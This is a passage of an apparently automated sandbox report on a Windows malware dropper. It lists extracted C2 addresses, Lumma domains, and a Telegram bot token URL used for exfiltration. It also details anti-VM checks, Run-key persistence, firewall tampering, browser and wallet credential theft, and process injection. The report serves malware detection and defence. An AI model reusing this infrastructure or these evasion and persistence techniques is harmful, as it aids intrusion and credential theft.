Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
28-04-2024 15:46
Static task
static1
Behavioral task
behavioral1
Sample
6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe
Resource
win10v2004-20240426-en
General
-
Target
6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe
-
Size
1.8MB
-
MD5
d63ebfda93fffc3cba2ebbf7771f6de8
-
SHA1
f91261190a4af4d85bb39e8becff4a501fe9dd70
-
SHA256
6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab
-
SHA512
e96f50b5a67866446197befb8b483f7974714bed3708557d5251d28064873949b06e873374422aa3fda1360fa59608eceab16de30eb73be2d03205ff437043cd
-
SSDEEP
49152:G3/bn64QhkUJoQGSME4Qfa+Cr9e9ugrF7+3:Gjn64ykUJolOLa+CrY9P7+
Malware Config
Extracted
amadey
4.20
http://193.233.132.139
-
install_dir
5454e6f062
-
install_file
explorta.exe
-
strings_key
c7a869c5ba1d72480093ec207994e2bf
-
url_paths
/sev56rkm/index.php
Extracted
amadey
4.17
http://193.233.132.167
-
install_dir
4d0ab15804
-
install_file
chrosha.exe
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Extracted
redline
@CLOUDYTTEAM
185.172.128.33:8970
Extracted
redline
Test1234
185.215.113.67:26260
Extracted
stealc
http://52.143.157.84
http://185.172.128.150
-
url_path
/c73eed764cc59dcb.php
Extracted
xworm
5.0
127.0.0.1:7000
91.92.252.220:7000
41.199.23.195:7000
saveclinetsforme68465454711991.publicvm.com:7000
bBT8anvIxhxDFmkf
-
Install_directory
%AppData%
-
install_file
explorer.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Extracted
lumma
https://affordcharmcropwo.shop/api
https://cleartotalfisherwo.shop/api
https://worryfillvolcawoi.shop/api
https://enthusiasimtitleow.shop/api
https://dismissalcylinderhostw.shop/api
https://diskretainvigorousiw.shop/api
https://communicationgenerwo.shop/api
https://productivelookewr.shop/api
https://pillowbrocccolipe.shop/api
https://tolerateilusidjukl.shop/api
https://shatterbreathepsw.shop/api
https://shortsvelventysjo.shop/api
https://incredibleextedwj.shop/api
https://alcojoldwograpciw.shop/api
https://liabilitynighstjsko.shop/api
https://demonstationfukewko.shop/api
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe family_xworm behavioral1/memory/5304-430-0x0000000000DE0000-0x0000000000DF2000-memory.dmp family_xworm -
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2044-227-0x0000000000400000-0x0000000000592000-memory.dmp family_zgrat_v1 C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_zgrat_v1 behavioral1/memory/2292-270-0x0000000000040000-0x0000000000100000-memory.dmp family_zgrat_v1 -
Glupteba payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/4412-928-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral1/memory/5616-1022-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral1/memory/4412-1082-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral1/memory/5880-1087-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral1/memory/5804-1086-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral1/memory/5880-1177-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral1/memory/5804-1198-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
biaVKzBpL112bRqSypIBjEkf.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" biaVKzBpL112bRqSypIBjEkf.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe family_redline C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_redline behavioral1/memory/3728-258-0x0000000000D90000-0x0000000000DE2000-memory.dmp family_redline behavioral1/memory/2292-270-0x0000000000040000-0x0000000000100000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe family_redline behavioral1/memory/5676-336-0x0000000000480000-0x00000000004D2000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
Processes:
6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exeexplorta.exeamert.exe86fa24d474.exeexplorta.exechrosha.exebiaVKzBpL112bRqSypIBjEkf.exeexplorta.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 86fa24d474.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrosha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ biaVKzBpL112bRqSypIBjEkf.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe -
Blocklisted process makes network request 4 IoCs
Processes:
rundll32.exerundll32.exerundll32.exeflow pid process 137 5504 rundll32.exe 177 5496 rundll32.exe 290 5328 rundll32.exe 177 5496 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 3632 netsh.exe 6036 netsh.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
chrosha.exeexplorta.exeexplorta.exeexplorta.exe6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exeamert.exe86fa24d474.exeInstall.exerundll32.exebiaVKzBpL112bRqSypIBjEkf.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 86fa24d474.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 86fa24d474.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion biaVKzBpL112bRqSypIBjEkf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion biaVKzBpL112bRqSypIBjEkf.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
RegAsm.exemstc.exeQgtzpEAOWB6zbl9VfLb2HqcM.exeu4bo.3.exeInstall.exerCuMQIT.exe6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exeexplorta.exef93de1e9ce.exechrosha.exeNewB.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation mstc.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation QgtzpEAOWB6zbl9VfLb2HqcM.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation u4bo.3.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation rCuMQIT.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation 6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation explorta.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation f93de1e9ce.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation chrosha.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation NewB.exe -
Executes dropped EXE 46 IoCs
Processes:
explorta.exeamert.exef93de1e9ce.exe86fa24d474.exeexplorta.exechrosha.exeswiiiii.exealexxxxxxxx.exekeks.exetrf.exegold.exeNewB.exejok.exeswiiii.exefile300un.exemstc.exeQgtzpEAOWB6zbl9VfLb2HqcM.exeRQgOZ9oytPXnDazWFumrc84r.exejhzxw4bTw0XNuv9c289x9RgQ.exeu4bo.0.exebiaVKzBpL112bRqSypIBjEkf.exerun.exeu4bo.3.exej7efxmeQRKfsUQJlnU7k63nh.exej7efxmeQRKfsUQJlnU7k63nh.exej7efxmeQRKfsUQJlnU7k63nh.exej7efxmeQRKfsUQJlnU7k63nh.exej7efxmeQRKfsUQJlnU7k63nh.exeumKW8PCP2RLAqU9q23aXwLM6.exeInstall.exeRQgOZ9oytPXnDazWFumrc84r.exejhzxw4bTw0XNuv9c289x9RgQ.exeInstall.execsrss.exeinjector.exeAssistant_109.0.5097.45_Setup.exe_sfx.exeexplorta.exeassistant_installer.exeassistant_installer.exeexplorer.exeNewB.exewindefender.exewindefender.exerCuMQIT.exeLVcUqVorwfBjoqbrr5tyeOln.exece-installer_7.14.2_vbox-6.1.20.exepid process 3532 explorta.exe 1720 amert.exe 1436 f93de1e9ce.exe 4128 86fa24d474.exe 4248 explorta.exe 432 chrosha.exe 2044 swiiiii.exe 4064 alexxxxxxxx.exe 3728 keks.exe 2292 trf.exe 684 gold.exe 5456 NewB.exe 5676 jok.exe 5916 swiiii.exe 2200 file300un.exe 5304 mstc.exe 5604 QgtzpEAOWB6zbl9VfLb2HqcM.exe 4412 RQgOZ9oytPXnDazWFumrc84r.exe 5616 jhzxw4bTw0XNuv9c289x9RgQ.exe 5656 u4bo.0.exe 3956 biaVKzBpL112bRqSypIBjEkf.exe 5836 run.exe 4420 u4bo.3.exe 2176 j7efxmeQRKfsUQJlnU7k63nh.exe 1480 j7efxmeQRKfsUQJlnU7k63nh.exe 1204 j7efxmeQRKfsUQJlnU7k63nh.exe 3024 j7efxmeQRKfsUQJlnU7k63nh.exe 5904 j7efxmeQRKfsUQJlnU7k63nh.exe 2720 umKW8PCP2RLAqU9q23aXwLM6.exe 5704 Install.exe 5804 RQgOZ9oytPXnDazWFumrc84r.exe 5880 jhzxw4bTw0XNuv9c289x9RgQ.exe 3728 Install.exe 6100 csrss.exe 2280 injector.exe 2768 Assistant_109.0.5097.45_Setup.exe_sfx.exe 564 explorta.exe 6048 assistant_installer.exe 4004 assistant_installer.exe 3036 explorer.exe 5248 NewB.exe 2700 windefender.exe 5132 windefender.exe 5672 rCuMQIT.exe 7048 LVcUqVorwfBjoqbrr5tyeOln.exe 7124 ce-installer_7.14.2_vbox-6.1.20.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
explorta.exe6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exeexplorta.exeamert.exe86fa24d474.exeexplorta.exechrosha.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine 6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine amert.exe Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine 86fa24d474.exe Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine chrosha.exe -
Loads dropped DLL 14 IoCs
Processes:
rundll32.exerundll32.exerundll32.exerun.exej7efxmeQRKfsUQJlnU7k63nh.exej7efxmeQRKfsUQJlnU7k63nh.exej7efxmeQRKfsUQJlnU7k63nh.exej7efxmeQRKfsUQJlnU7k63nh.exej7efxmeQRKfsUQJlnU7k63nh.exeassistant_installer.exeassistant_installer.exerundll32.exepid process 5332 rundll32.exe 5504 rundll32.exe 5496 rundll32.exe 5836 run.exe 2176 j7efxmeQRKfsUQJlnU7k63nh.exe 1480 j7efxmeQRKfsUQJlnU7k63nh.exe 1204 j7efxmeQRKfsUQJlnU7k63nh.exe 3024 j7efxmeQRKfsUQJlnU7k63nh.exe 5904 j7efxmeQRKfsUQJlnU7k63nh.exe 6048 assistant_installer.exe 6048 assistant_installer.exe 4004 assistant_installer.exe 4004 assistant_installer.exe 5328 rundll32.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\biaVKzBpL112bRqSypIBjEkf.exe themida behavioral1/memory/3956-777-0x0000000140000000-0x0000000140749000-memory.dmp themida behavioral1/memory/3956-1024-0x0000000140000000-0x0000000140749000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
explorta.exemstc.exejhzxw4bTw0XNuv9c289x9RgQ.exeRQgOZ9oytPXnDazWFumrc84r.execsrss.exeLVcUqVorwfBjoqbrr5tyeOln.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\86fa24d474.exe = "C:\\Users\\Admin\\1000017002\\86fa24d474.exe" explorta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" mstc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" jhzxw4bTw0XNuv9c289x9RgQ.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" RQgOZ9oytPXnDazWFumrc84r.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" LVcUqVorwfBjoqbrr5tyeOln.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f93de1e9ce.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\f93de1e9ce.exe" explorta.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
biaVKzBpL112bRqSypIBjEkf.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA biaVKzBpL112bRqSypIBjEkf.exe -
Drops Chrome extension 2 IoCs
Processes:
rCuMQIT.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json rCuMQIT.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json rCuMQIT.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
rCuMQIT.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini rCuMQIT.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exej7efxmeQRKfsUQJlnU7k63nh.exej7efxmeQRKfsUQJlnU7k63nh.exedescription ioc process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\D: j7efxmeQRKfsUQJlnU7k63nh.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: j7efxmeQRKfsUQJlnU7k63nh.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\D: j7efxmeQRKfsUQJlnU7k63nh.exe File opened (read-only) \??\F: j7efxmeQRKfsUQJlnU7k63nh.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 169 ip-api.com 183 api.myip.com 184 api.myip.com 185 ipinfo.io 186 ipinfo.io -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000016001\f93de1e9ce.exe autoit_exe -
Drops file in System32 directory 44 IoCs
Processes:
powershell.exeInstall.exepowershell.exerCuMQIT.exebiaVKzBpL112bRqSypIBjEkf.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content rCuMQIT.exe File opened for modification C:\Windows\System32\GroupPolicy biaVKzBpL112bRqSypIBjEkf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 rCuMQIT.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 rCuMQIT.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini biaVKzBpL112bRqSypIBjEkf.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI biaVKzBpL112bRqSypIBjEkf.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA rCuMQIT.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol biaVKzBpL112bRqSypIBjEkf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 rCuMQIT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA rCuMQIT.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exeexplorta.exeamert.exe86fa24d474.exeexplorta.exechrosha.exebiaVKzBpL112bRqSypIBjEkf.exeexplorta.exepid process 4552 6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe 3532 explorta.exe 1720 amert.exe 4128 86fa24d474.exe 4248 explorta.exe 432 chrosha.exe 3956 biaVKzBpL112bRqSypIBjEkf.exe 564 explorta.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
swiiiii.exealexxxxxxxx.exegold.exeswiiii.exefile300un.exerun.execmd.exedescription pid process target process PID 2044 set thread context of 4256 2044 swiiiii.exe RegAsm.exe PID 4064 set thread context of 2044 4064 alexxxxxxxx.exe RegAsm.exe PID 684 set thread context of 4064 684 gold.exe RegAsm.exe PID 5916 set thread context of 6004 5916 swiiii.exe RegAsm.exe PID 2200 set thread context of 5892 2200 file300un.exe AddInProcess32.exe PID 5836 set thread context of 3372 5836 run.exe cmd.exe PID 3372 set thread context of 4720 3372 cmd.exe MSBuild.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
RQgOZ9oytPXnDazWFumrc84r.exejhzxw4bTw0XNuv9c289x9RgQ.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN RQgOZ9oytPXnDazWFumrc84r.exe File opened (read-only) \??\VBoxMiniRdrDN jhzxw4bTw0XNuv9c289x9RgQ.exe -
Drops file in Program Files directory 14 IoCs
Processes:
